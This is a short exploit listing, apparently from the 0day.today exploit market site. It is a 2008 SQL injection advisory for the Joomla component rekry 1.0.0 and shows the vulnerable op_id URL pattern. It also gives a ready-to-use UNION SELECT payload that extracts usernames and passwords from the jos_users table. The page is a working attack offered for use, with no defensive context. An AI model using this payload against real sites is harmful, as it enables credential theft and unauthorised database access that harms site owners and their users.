[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability

Author
Sniper456
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2768
Category
web applications
Date add
23-03-2008
Platform
unsorted
================================================================
Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability
================================================================




@ Joomla component rekry!Joom (op_id) <=1.0.0 SQL injectIon.


Author:Sniper456

Greetss: My chilean people

Developer:Matti Kiviharju


**Bug:

http://www.target.com/index.php?option=com_rekry&Itemid=xX&rekryview=view&op_id=[SQL]

**Example

http://www.target.com/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20jos_users+limit+1,1--



# Fro000M CHILE my frieeeenD! 2008 # /* Grande colo colo */




#  0day.today [2024-11-16]  #